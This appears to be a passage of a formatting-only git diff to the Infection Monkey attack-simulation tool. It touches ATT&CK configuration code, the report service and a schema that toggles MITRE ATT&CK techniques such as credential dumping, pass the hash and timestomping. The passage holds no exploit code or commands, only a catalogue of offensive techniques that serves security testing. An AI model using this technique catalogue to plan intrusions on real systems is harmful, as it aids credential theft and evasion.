# Check if current array field has attack_techniques assigned to it
if "attack_techniques" in array_field and array_field["attack_techniques"]:
should_remove = not AttackConfig.should_enable_field(
- array_field["attack_techniques"], attack_techniques
+ array_field["attack_techniques"], attack_techniques
)
# If exploiter's attack technique is disabled, disable the exploiter/scanner/PBA
AttackConfig.r_alter_array(
- monkey_config, key, array_field["enum"][0], remove=should_remove
+ monkey_config, key, array_field["enum"][0], remove=should_remove
)
@staticmethod
def set_booleans(attack_techniques, monkey_config, monkey_schema):
"""
- Sets boolean type fields, like "should use mimikatz?" in monkey's config according to ATT&CK matrix
+ Sets boolean type fields, like "should use mimikatz?" in monkey's config according to
+ ATT&CK matrix
:param attack_techniques: ATT&CK techniques dict. Format: {'T1110': True, ...}
:param monkey_config: Monkey island's configuration
:param monkey_schema: Monkey configuration schema
@@ -94,9 +96,11 @@ class AttackConfig(object):
@staticmethod
def r_set_booleans(path, value, attack_techniques, monkey_config):
"""
- Recursively walks trough monkey configuration (DFS) to find which boolean fields needs to be set and sets them
+ Recursively walks trough monkey configuration (DFS) to find which boolean fields needs to
+ be set and sets them
according to ATT&CK matrix.
- :param path: Property names that leads to current value. E.g. ['monkey', 'system_info', 'should_use_mimikatz']
+ :param path: Property names that leads to current value. E.g. ['monkey', 'system_info',
+ 'should_use_mimikatz']
:param value: Value of config property
:param attack_techniques: ATT&CK techniques dict. Format: {'T1110': True, ...}
:param monkey_config: Monkey island's configuration
@@ -105,15 +109,16 @@ class AttackConfig(object):
dictionary = {}
# If 'value' is a boolean value that should be set:
if (
- "type" in value
- and value["type"] == "boolean"
- and "attack_techniques" in value
- and value["attack_techniques"]
+ "type" in value
+ and value["type"] == "boolean"
+ and "attack_techniques" in value
+ and value["attack_techniques"]
):
AttackConfig.set_bool_conf_val(
- path,
- AttackConfig.should_enable_field(value["attack_techniques"], attack_techniques),
- monkey_config,
+ path,
+ AttackConfig.should_enable_field(value["attack_techniques"],
+ attack_techniques),
+ monkey_config,
)
# If 'value' is dict, we go over each of it's fields to search for booleans
elif "properties" in value:
@@ -130,7 +135,8 @@ class AttackConfig(object):
def set_bool_conf_val(path, val, monkey_config):
"""
Changes monkey's configuration by setting one of its boolean fields value
- :param path: Path to boolean value in monkey's configuration. ['monkey', 'system_info', 'should_use_mimikatz']
+ :param path: Path to boolean value in monkey's configuration. ['monkey', 'system_info',
+ 'should_use_mimikatz']
:param val: Boolean
:param monkey_config: Monkey's configuration
"""
@@ -150,7 +156,7 @@ class AttackConfig(object):
return False
except KeyError:
logger.error(
- "Attack technique %s is defined in schema, but not implemented." % technique
+ "Attack technique %s is defined in schema, but not implemented." % technique
)
return True
@@ -196,7 +202,7 @@ class AttackConfig(object):
for type_name, attack_type in list(attack_config.items()):
for key, technique in list(attack_type["properties"].items()):
techniques[key] = {
- "selected": technique["value"],
- "type": SCHEMA["properties"][type_name]["title"],
+ "selected":technique["value"],
+ "type":SCHEMA["properties"][type_name]["title"],
}
return techniques
diff --git a/monkey/monkey_island/cc/services/attack/attack_report.py b/monkey/monkey_island/cc/services/attack/attack_report.py
index 5845db502..a448e83c5 100644
--- a/monkey/monkey_island/cc/services/attack/attack_report.py
+++ b/monkey/monkey_island/cc/services/attack/attack_report.py
@@ -50,42 +50,42 @@ __author__ = "VakarisZ"
LOG = logging.getLogger(__name__)
TECHNIQUES = {
- "T1210": T1210.T1210,
- "T1197": T1197.T1197,
- "T1110": T1110.T1110,
- "T1075": T1075.T1075,
- "T1003": T1003.T1003,
- "T1059": T1059.T1059,
- "T1086": T1086.T1086,
- "T1082": T1082.T1082,
- "T1145": T1145.T1145,
- "T1065": T1065.T1065,
- "T1105": T1105.T1105,
- "T1035": T1035.T1035,
- "T1129": T1129.T1129,
- "T1106": T1106.T1106,
- "T1107": T1107.T1107,
- "T1188": T1188.T1188,
- "T1090": T1090.T1090,
- "T1041": T1041.T1041,
- "T1222": T1222.T1222,
- "T1005": T1005.T1005,
- "T1018": T1018.T1018,
- "T1016": T1016.T1016,
- "T1021": T1021.T1021,
- "T1064": T1064.T1064,
- "T1136": T1136.T1136,
- "T1156": T1156.T1156,
- "T1504": T1504.T1504,
- "T1158": T1158.T1158,
- "T1154": T1154.T1154,
- "T1166": T1166.T1166,
- "T1168": T1168.T1168,
- "T1053": T1053.T1053,
- "T1099": T1099.T1099,
- "T1216": T1216.T1216,
- "T1087": T1087.T1087,
- "T1146": T1146.T1146,
+ "T1210":T1210.T1210,
+ "T1197":T1197.T1197,
+ "T1110":T1110.T1110,
+ "T1075":T1075.T1075,
+ "T1003":T1003.T1003,
+ "T1059":T1059.T1059,
+ "T1086":T1086.T1086,
+ "T1082":T1082.T1082,
+ "T1145":T1145.T1145,
+ "T1065":T1065.T1065,
+ "T1105":T1105.T1105,
+ "T1035":T1035.T1035,
+ "T1129":T1129.T1129,
+ "T1106":T1106.T1106,
+ "T1107":T1107.T1107,
+ "T1188":T1188.T1188,
+ "T1090":T1090.T1090,
+ "T1041":T1041.T1041,
+ "T1222":T1222.T1222,
+ "T1005":T1005.T1005,
+ "T1018":T1018.T1018,
+ "T1016":T1016.T1016,
+ "T1021":T1021.T1021,
+ "T1064":T1064.T1064,
+ "T1136":T1136.T1136,
+ "T1156":T1156.T1156,
+ "T1504":T1504.T1504,
+ "T1158":T1158.T1158,
+ "T1154":T1154.T1154,
+ "T1166":T1166.T1166,
+ "T1168":T1168.T1168,
+ "T1053":T1053.T1053,
+ "T1099":T1099.T1099,
+ "T1216":T1216.T1216,
+ "T1087":T1087.T1087,
+ "T1146":T1146.T1146,
}
REPORT_NAME = "new_report"
@@ -102,21 +102,21 @@ class AttackReportService:
:return: Report object
"""
report = {
- "techniques": {},
- "meta": {"latest_monkey_modifytime": Monkey.get_latest_modifytime()},
- "name": REPORT_NAME,
+ "techniques":{},
+ "meta":{"latest_monkey_modifytime":Monkey.get_latest_modifytime()},
+ "name":REPORT_NAME,
}
for tech_id, tech_info in list(AttackConfig.get_techniques_for_report().items()):
try:
technique_report_data = TECHNIQUES[tech_id].get_report_data()
technique_report_data.update(tech_info)
- report["techniques"].update({tech_id: technique_report_data})
+ report["techniques"].update({tech_id:technique_report_data})
except KeyError as e:
LOG.error(
- "Attack technique does not have it's report component added "
- "to attack report service. %s" % e
+ "Attack technique does not have it's report component added "
+ "to attack report service. %s" % e
)
- mongo.db.attack_report.replace_one({"name": REPORT_NAME}, report, upsert=True)
+ mongo.db.attack_report.replace_one({"name":REPORT_NAME}, report, upsert=True)
return report
@staticmethod
@@ -127,9 +127,9 @@ class AttackReportService:
"""
return [
x["timestamp"]
- for x in mongo.db.telemetry.find({"telem_category": "attack"})
- .sort("timestamp", -1)
- .limit(1)
+ for x in mongo.db.telemetry.find({"telem_category":"attack"})
+ .sort("timestamp", -1)
+ .limit(1)
][0]
@staticmethod
@@ -140,7 +140,7 @@ class AttackReportService:
"""
if AttackReportService.is_report_generated():
monkey_modifytime = Monkey.get_latest_modifytime()
- latest_report = mongo.db.attack_report.find_one({"name": REPORT_NAME})
+ latest_report = mongo.db.attack_report.find_one({"name":REPORT_NAME})
report_modifytime = latest_report["meta"]["latest_monkey_modifytime"]
if monkey_modifytime and report_modifytime and monkey_modifytime == report_modifytime:
return latest_report
@@ -161,5 +161,5 @@ class AttackReportService:
delete_result = mongo.db.attack_report.delete_many({})
if mongo.db.attack_report.count_documents({}) != 0:
raise RuntimeError(
- "Attack Report cache not cleared. DeleteResult: " + delete_result.raw_result
+ "Attack Report cache not cleared. DeleteResult: " + delete_result.raw_result
)
diff --git a/monkey/monkey_island/cc/services/attack/attack_schema.py b/monkey/monkey_island/cc/services/attack/attack_schema.py
index f19295c5a..ed5428461 100644
--- a/monkey/monkey_island/cc/services/attack/attack_schema.py
+++ b/monkey/monkey_island/cc/services/attack/attack_schema.py
@@ -1,417 +1,455 @@
SCHEMA = {
- "title": "ATT&CK configuration",
- "type": "object",
- "properties": {
- "execution": {
- "title": "Execution",
- "type": "object",
- "link": "https://attack.mitre.org/tactics/TA0002/",
- "properties": {
- "T1059": {
- "title": "Command line interface",
- "type": "bool",
- "value": True,
- "necessary": True,
- "link": "https://attack.mitre.org/techniques/T1059",
- "description": "Adversaries may use command-line interfaces to interact with systems "
- "and execute other software during the course of an operation.",
+ "title":"ATT&CK configuration",
+ "type":"object",
+ "properties":{
+ "execution":{
+ "title":"Execution",
+ "type":"object",
+ "link":"https://attack.mitre.org/tactics/TA0002/",
+ "properties":{
+ "T1059":{
+ "title":"Command line interface",
+ "type":"bool",
+ "value":True,
+ "necessary":True,
+ "link":"https://attack.mitre.org/techniques/T1059",
+ "description":"Adversaries may use command-line interfaces to interact with "
+ "systems "
+ "and execute other software during the course of an operation.",
},
- "T1129": {
- "title": "Execution through module load",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1129",
- "description": "The Windows module loader can be instructed to load DLLs from arbitrary "
- "local paths and arbitrary Universal Naming Convention (UNC) network paths.",
- "depends_on": ["T1078", "T1003"],
+ "T1129":{
+ "title":"Execution through module load",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1129",
+ "description":"The Windows module loader can be instructed to load DLLs from "
+ "arbitrary "
+ "local paths and arbitrary Universal Naming Convention (UNC) "
+ "network paths.",
+ "depends_on":["T1078", "T1003"],
},
- "T1106": {
- "title": "Execution through API",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1106",
- "description": "Adversary tools may directly use the Windows application "
- "programming interface (API) to execute binaries.",
- "depends_on": ["T1210"],
+ "T1106":{
+ "title":"Execution through API",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1106",
+ "description":"Adversary tools may directly use the Windows application "
+ "programming interface (API) to execute binaries.",
+ "depends_on":["T1210"],
},
- "T1086": {
- "title": "Powershell",
- "type": "bool",
- "value": True,
- "necessary": True,
- "link": "https://attack.mitre.org/techniques/T1086",
- "description": "Adversaries can use PowerShell to perform a number of actions,"
- " including discovery of information and execution of code.",
+ "T1086":{
+ "title":"Powershell",
+ "type":"bool",
+ "value":True,
+ "necessary":True,
+ "link":"https://attack.mitre.org/techniques/T1086",
+ "description":"Adversaries can use PowerShell to perform a number of actions,"
+ " including discovery of information and execution of code.",
},
- "T1064": {
- "title": "Scripting",
- "type": "bool",
- "value": True,
- "necessary": True,
- "link": "https://attack.mitre.org/techniques/T1064",
- "description": "Adversaries may use scripts to aid in operations and "
- "perform multiple actions that would otherwise be manual.",
+ "T1064":{
+ "title":"Scripting",
+ "type":"bool",
+ "value":True,
+ "necessary":True,
+ "link":"https://attack.mitre.org/techniques/T1064",
+ "description":"Adversaries may use scripts to aid in operations and "
+ "perform multiple actions that would otherwise be manual.",
},
- "T1035": {
- "title": "Service execution",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1035",
- "description": "Adversaries may execute a binary, command, or script via a method "
- "that interacts with Windows services, such as the Service Control Manager.",
- "depends_on": ["T1210"],
+ "T1035":{
+ "title":"Service execution",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1035",
+ "description":"Adversaries may execute a binary, command, or script via a "
+ "method "
+ "that interacts with Windows services, such as the Service "
+ "Control Manager.",
+ "depends_on":["T1210"],
},
- "T1154": {
- "title": "Trap",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1154",
- "description": "Adversaries can use the trap command to register code to be executed "
- "when the shell encounters specific interrupts.",
+ "T1154":{
+ "title":"Trap",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1154",
+ "description":"Adversaries can use the trap command to register code to be "
+ "executed "
+ "when the shell encounters specific interrupts.",
},
},
},
- "persistence": {
- "title": "Persistence",
- "type": "object",
- "link": "https://attack.mitre.org/tactics/TA0003/",
- "properties": {
- "T1156": {
- "title": ".bash_profile and .bashrc",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1156",
- "description": "Adversaries may abuse shell scripts by "
- "inserting arbitrary shell commands to gain persistence, which "
- "would be executed every time the user logs in or opens a new shell.",
- "depends_on": ["T1504"],
+ "persistence":{
+ "title":"Persistence",
+ "type":"object",
+ "link":"https://attack.mitre.org/tactics/TA0003/",
+ "properties":{
+ "T1156":{
+ "title":".bash_profile and .bashrc",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1156",
+ "description":"Adversaries may abuse shell scripts by "
+ "inserting arbitrary shell commands to gain persistence, which "
+ "would be executed every time the user logs in or opens a new "
+ "shell.",
+ "depends_on":["T1504"],
},
- "T1136": {
- "title": "Create account",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1136",
- "description": "Adversaries with a sufficient level of access "
- "may create a local system, domain, or cloud tenant account.",
+ "T1136":{
+ "title":"Create account",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1136",
+ "description":"Adversaries with a sufficient level of access "
+ "may create a local system, domain, or cloud tenant account.",
},
- "T1158": {
- "title": "Hidden files and directories",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1158",
- "description": "Adversaries can hide files and folders on the system "
- "and evade a typical user or system analysis that does not "
- "incorporate investigation of hidden files.",
+ "T1158":{
+ "title":"Hidden files and directories",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1158",
+ "description":"Adversaries can hide files and folders on the system "
+ "and evade a typical user or system analysis that does not "
+ "incorporate investigation of hidden files.",
},
- "T1168": {
- "title": "Local job scheduling",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1168/",
- "description": "Linux supports multiple methods for creating pre-scheduled and "
- "periodic background jobs. Job scheduling can be used by adversaries to "
- "schedule running malicious code at some specified date and time.",
- "depends_on": ["T1053"],
+ "T1168":{
+ "title":"Local job scheduling",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1168/",
+ "description":"Linux supports multiple methods for creating pre-scheduled and "
+ "periodic background jobs. Job scheduling can be used by "
+ "adversaries to "
+ "schedule running malicious code at some specified date and "
+ "time.",
+ "depends_on":["T1053"],
},
- "T1504": {
- "title": "PowerShell profile",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1504",
- "description": "Adversaries may gain persistence and elevate privileges "
- "in certain situations by abusing PowerShell profiles which "
- "are scripts that run when PowerShell starts.",
- "depends_on": ["T1156"],
+ "T1504":{
+ "title":"PowerShell profile",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1504",
+ "description":"Adversaries may gain persistence and elevate privileges "
+ "in certain situations by abusing PowerShell profiles which "
+ "are scripts that run when PowerShell starts.",
+ "depends_on":["T1156"],
},
- "T1053": {
- "title": "Scheduled task",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1053",
- "description": "Windows utilities can be used to schedule programs or scripts to "
- "be executed at a date and time. An adversary may use task scheduling to "
- "execute programs at system startup or on a scheduled basis for persistence.",
- "depends_on": ["T1168"],
+ "T1053":{
+ "title":"Scheduled task",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1053",
+ "description":"Windows utilities can be used to schedule programs or scripts "
+ "to "
+ "be executed at a date and time. An adversary may use task "
+ "scheduling to "
+ "execute programs at system startup or on a scheduled basis for "
+ "persistence.",
+ "depends_on":["T1168"],
},
- "T1166": {
- "title": "Setuid and Setgid",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1166",
- "description": "Adversaries can set the setuid or setgid bits to get code running in "
- "a different user’s context.",
+ "T1166":{
+ "title":"Setuid and Setgid",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1166",
+ "description":"Adversaries can set the setuid or setgid bits to get code "
+ "running in "
+ "a different user’s context.",
},
},
},
- "defence_evasion": {
- "title": "Defence evasion",
- "type": "object",
- "link": "https://attack.mitre.org/tactics/TA0005/",
- "properties": {
- "T1197": {
- "title": "BITS jobs",
- "type": "bool",
- "value": True,
- "necessary": True,
- "link": "https://attack.mitre.org/techniques/T1197",
- "description": "Adversaries may abuse BITS to download, execute, "
- "and even clean up after running malicious code.",
+ "defence_evasion":{
+ "title":"Defence evasion",
+ "type":"object",
+ "link":"https://attack.mitre.org/tactics/TA0005/",
+ "properties":{
+ "T1197":{
+ "title":"BITS jobs",
+ "type":"bool",
+ "value":True,
+ "necessary":True,
+ "link":"https://attack.mitre.org/techniques/T1197",
+ "description":"Adversaries may abuse BITS to download, execute, "
+ "and even clean up after running malicious code.",
},
- "T1146": {
- "title": "Clear command history",
- "type": "bool",
- "value": False,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1146",
- "description": "Adversaries may clear/disable command history of a compromised "
- "account to conceal the actions undertaken during an intrusion.",
+ "T1146":{
+ "title":"Clear command history",
+ "type":"bool",
+ "value":False,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1146",
+ "description":"Adversaries may clear/disable command history of a compromised "
+ "account to conceal the actions undertaken during an intrusion.",
},
- "T1107": {
- "title": "File Deletion",
- "type": "bool",
- "value": True,
- "necessary": True,
- "link": "https://attack.mitre.org/techniques/T1107",
- "description": "Adversaries may remove files over the course of an intrusion "
- "to keep their footprint low or remove them at the end as part "
- "of the post-intrusion cleanup process.",
+ "T1107":{
+ "title":"File Deletion",
+ "type":"bool",
+ "value":True,
+ "necessary":True,
+ "link":"https://attack.mitre.org/techniques/T1107",
+ "description":"Adversaries may remove files over the course of an intrusion "
+ "to keep their footprint low or remove them at the end as part "
+ "of the post-intrusion cleanup process.",
},
- "T1222": {
- "title": "File permissions modification",
- "type": "bool",
- "value": True,
- "necessary": True,
- "link": "https://attack.mitre.org/techniques/T1222",
- "description": "Adversaries may modify file permissions/attributes to evade intended DACLs.",
+ "T1222":{
+ "title":"File permissions modification",
+ "type":"bool",
+ "value":True,
+ "necessary":True,
+ "link":"https://attack.mitre.org/techniques/T1222",
+ "description":"Adversaries may modify file permissions/attributes to evade "
+ "intended DACLs.",
},
- "T1099": {
- "title": "Timestomping",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1099",
- "description": "Adversaries may modify file time attributes to hide new/changes to existing "
- "files to avoid attention from forensic investigators or file analysis tools.",
+ "T1099":{
+ "title":"Timestomping",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1099",
+ "description":"Adversaries may modify file time attributes to hide "
+ "new/changes to existing "
+ "files to avoid attention from forensic investigators or file "
+ "analysis tools.",
},
- "T1216": {
- "title": "Signed script proxy execution",
- "type": "bool",
- "value": False,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1216",
- "description": "Adversaries may use scripts signed with trusted certificates to "
- "proxy execution of malicious files on Windows systems.",
+ "T1216":{
+ "title":"Signed script proxy execution",
+ "type":"bool",
+ "value":False,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1216",
+ "description":"Adversaries may use scripts signed with trusted certificates to "
+ "proxy execution of malicious files on Windows systems.",
},
},
},
- "credential_access": {
- "title": "Credential access",
- "type": "object",
- "link": "https://attack.mitre.org/tactics/TA0006/",
- "properties": {
- "T1110": {
- "title": "Brute force",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1110",
- "description": "Adversaries may use brute force techniques to attempt access to accounts "
- "when passwords are unknown or when password hashes are obtained.",
- "depends_on": ["T1210", "T1021"],
+ "credential_access":{
+ "title":"Credential access",
+ "type":"object",
+ "link":"https://attack.mitre.org/tactics/TA0006/",
+ "properties":{
+ "T1110":{
+ "title":"Brute force",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1110",
+ "description":"Adversaries may use brute force techniques to attempt access "
+ "to accounts "
+ "when passwords are unknown or when password hashes are "
+ "obtained.",
+ "depends_on":["T1210", "T1021"],
},
- "T1003": {
- "title": "Credential dumping",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1003",
- "description": "Mapped with T1078 Valid Accounts because both techniques require"
- " same credential harvesting modules. "
- "Credential dumping is the process of obtaining account login and password "
- "information, normally in the form of a hash or a clear text password, "
- "from the operating system and software.",
- "depends_on": ["T1078"],
+ "T1003":{
+ "title":"Credential dumping",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1003",
+ "description":"Mapped with T1078 Valid Accounts because both techniques require"
+ " same credential harvesting modules. "
+ "Credential dumping is the process of obtaining account login "
+ "and password "
+ "information, normally in the form of a hash or a clear text "
+ "password, "
+ "from the operating system and software.",
+ "depends_on":["T1078"],
},
- "T1145": {
- "title": "Private keys",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1145",
- "description": "Adversaries may gather private keys from compromised systems for use in "
- "authenticating to Remote Services like SSH or for use in decrypting "
- "other collected files such as email.",
- "depends_on": ["T1110", "T1210"],
+ "T1145":{
+ "title":"Private keys",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1145",
+ "description":"Adversaries may gather private keys from compromised systems "
+ "for use in "
+ "authenticating to Remote Services like SSH or for use in "
+ "decrypting "
+ "other collected files such as email.",
+ "depends_on":["T1110", "T1210"],
},
},
},
- "discovery": {
- "title": "Discovery",
- "type": "object",
- "link": "https://attack.mitre.org/tactics/TA0007/",
- "properties": {
- "T1087": {
- "title": "Account Discovery",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1087",
- "description": "Adversaries may attempt to get a listing of accounts on a system or "
- "within an environment. This information can help adversaries determine which "
- "accounts exist to aid in follow-on behavior.",
+ "discovery":{
+ "title":"Discovery",
+ "type":"object",
+ "link":"https://attack.mitre.org/tactics/TA0007/",
+ "properties":{
+ "T1087":{
+ "title":"Account Discovery",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1087",
+ "description":"Adversaries may attempt to get a listing of accounts on a "
+ "system or "
+ "within an environment. This information can help adversaries "
+ "determine which "
+ "accounts exist to aid in follow-on behavior.",
},
- "T1018": {
- "title": "Remote System Discovery",
- "type": "bool",
- "value": True,
- "necessary": True,
- "link": "https://attack.mitre.org/techniques/T1018",
- "description": "Adversaries will likely attempt to get a listing of other systems by IP address, "
- "hostname, or other logical identifier on a network for lateral movement.",
+ "T1018":{
+ "title":"Remote System Discovery",
+ "type":"bool",
+ "value":True,
+ "necessary":True,
+ "link":"https://attack.mitre.org/techniques/T1018",
+ "description":"Adversaries will likely attempt to get a listing of other "
+ "systems by IP address, "
+ "hostname, or other logical identifier on a network for lateral"
+ " movement.",
},
- "T1082": {
- "title": "System information discovery",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1082",
- "depends_on": ["T1016", "T1005"],
- "description": "An adversary may attempt to get detailed information about the "
- "operating system and hardware, including version, patches, hotfixes, "
- "service packs, and architecture.",
+ "T1082":{
+ "title":"System information discovery",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1082",
+ "depends_on":["T1016", "T1005"],
+ "description":"An adversary may attempt to get detailed information about the "
+ "operating system and hardware, including version, patches, "
+ "hotfixes, "
+ "service packs, and architecture.",
},
- "T1016": {
- "title": "System network configuration discovery",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1016",
- "depends_on": ["T1005", "T1082"],
- "description": "Adversaries will likely look for details about the network configuration "
- "and settings of systems they access or through information discovery"
- " of remote systems.",
+ "T1016":{
+ "title":"System network configuration discovery",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1016",
+ "depends_on":["T1005", "T1082"],
+ "description":"Adversaries will likely look for details about the network "
+ "configuration "
+ "and settings of systems they access or through information "
+ "discovery"
+ " of remote systems.",
},
},
},
- "lateral_movement": {
- "title": "Lateral movement",
- "type": "object",
- "link": "https://attack.mitre.org/tactics/TA0008/",
- "properties": {
- "T1210": {
- "title": "Exploitation of Remote services",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1210",
- "description": "Exploitation of a software vulnerability occurs when an adversary "
- "takes advantage of a programming error in a program, service, or within the "
- "operating system software or kernel itself to execute adversary-controlled code.",
+ "lateral_movement":{
+ "title":"Lateral movement",
+ "type":"object",
+ "link":"https://attack.mitre.org/tactics/TA0008/",
+ "properties":{
+ "T1210":{
+ "title":"Exploitation of Remote services",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1210",
+ "description":"Exploitation of a software vulnerability occurs when an "
+ "adversary "
+ "takes advantage of a programming error in a program, service, "
+ "or within the "
+ "operating system software or kernel itself to execute "
+ "adversary-controlled code.",
},
- "T1075": {
- "title": "Pass the hash",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1075",
- "description": "Pass the hash (PtH) is a method of authenticating as a user without "
- "having access to the user's cleartext password.",
+ "T1075":{
+ "title":"Pass the hash",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1075",
+ "description":"Pass the hash (PtH) is a method of authenticating as a user "
+ "without "
+ "having access to the user's cleartext password.",
},
- "T1105": {
- "title": "Remote file copy",
- "type": "bool",
- "value": True,
- "necessary": True,
- "link": "https://attack.mitre.org/techniques/T1105",
- "description": "Files may be copied from one system to another to stage "
- "adversary tools or other files over the course of an operation.",
+ "T1105":{
+ "title":"Remote file copy",
+ "type":"bool",
+ "value":True,
+ "necessary":True,
+ "link":"https://attack.mitre.org/techniques/T1105",
+ "description":"Files may be copied from one system to another to stage "
+ "adversary tools or other files over the course of an operation.",
},
- "T1021": {
- "title": "Remote services",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1021",
- "depends_on": ["T1110"],
- "description": "An adversary may use Valid Accounts to log into a service"
- " specifically designed to accept remote connections.",
+ "T1021":{
+ "title":"Remote services",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1021",
+ "depends_on":["T1110"],
+ "description":"An adversary may use Valid Accounts to log into a service"
+ " specifically designed to accept remote connections.",
},
},
},
- "collection": {
- "title": "Collection",
- "type": "object",
- "link": "https://attack.mitre.org/tactics/TA0009/",
- "properties": {
- "T1005": {
- "title": "Data from local system",
- "type": "bool",
- "value": True,
- "necessary": False,
- "link": "https://attack.mitre.org/techniques/T1005",
- "depends_on": ["T1016", "T1082"],
- "description": "Sensitive data can be collected from local system sources, such as the file system "
- "or databases of information residing on the system prior to Exfiltration.",
+ "collection":{
+ "title":"Collection",
+ "type":"object",
+ "link":"https://attack.mitre.org/tactics/TA0009/",
+ "properties":{
+ "T1005":{
+ "title":"Data from local system",
+ "type":"bool",
+ "value":True,
+ "necessary":False,
+ "link":"https://attack.mitre.org/techniques/T1005",
+ "depends_on":["T1016", "T1082"],
+ "description":"Sensitive data can be collected from local system sources, "
+ "such as the file system "
+ "or databases of information residing on the system prior to "
+ "Exfiltration.",
}
},
},
- "command_and_control": {
- "title": "Command and Control",
- "type": "object",
- "link": "https://attack.mitre.org/tactics/TA0011/",
- "properties": {
- "T1090": {
- "title": "Connection proxy",
- "type": "bool",
- "value": True,
- "necessary": True,
- "link": "https://attack.mitre.org/techniques/T1090",
- "description": "A connection proxy is used to direct network traffic between systems "
- "or act as an intermediary for network communications.",
+ "command_and_control":{
+ "title":"Command and Control",
+ "type":"object",
+ "link":"https://attack.mitre.org/tactics/TA0011/",
+ "properties":{
+ "T1090":{
+ "title":"Connection proxy",
+ "type":"bool",
+ "value":True,
+ "necessary":True,
+ "link":"https://attack.mitre.org/techniques/T1090",
+ "description":"A connection proxy is used to direct network traffic between "
+ "systems "
+ "or act as an intermediary for network communications.",
},
- "T1065": {
- "title": "Uncommonly used port",
- "type": "bool",
- "value": True,
- "necessary": True,
- "link": "https://attack.mitre.org/techniques/T1065",
- "description": "Adversaries may conduct C2 communications over a non-standard "
- "port to bypass proxies and firewalls that have been improperly configured.",
+ "T1065":{
+ "title":"Uncommonly used port",
+ "type":"bool",
+ "value":True,
+ "necessary":True,
+ "link":"https://attack.mitre.org/techniques/T1065",
+ "description":"Adversaries may conduct C2 communications over a non-standard "
+ "port to bypass proxies and firewalls that have been improperly "
+ "configured.",
},
- "T1188": {
- "title": "Multi-hop proxy",
- "type": "bool",
- "value": True,
- "necessary": True,
- "link": "https://attack.mitre.org/techniques/T1188",
- "description": "To disguise the source of malicious traffic, "
- "adversaries may chain together multiple proxies.",
+ "T1188":{
+ "title":"Multi-hop proxy",
+ "type":"bool",
+ "value":True,
+ "necessary":True,
+ "link":"https://attack.mitre.org/techniques/T1188",
+ "description":"To disguise the source of malicious traffic, "
+ "adversaries may chain together multiple proxies.",
},
},
},
- "exfiltration": {
- "title": "Exfiltration",
- "type": "object",
- "link": "https://attack.mitre.org/tactics/TA0010/",
- "properties": {
- "T1041": {
- "title": "Exfiltration Over Command and Control Channel",
- "type": "bool",
- "value": True,
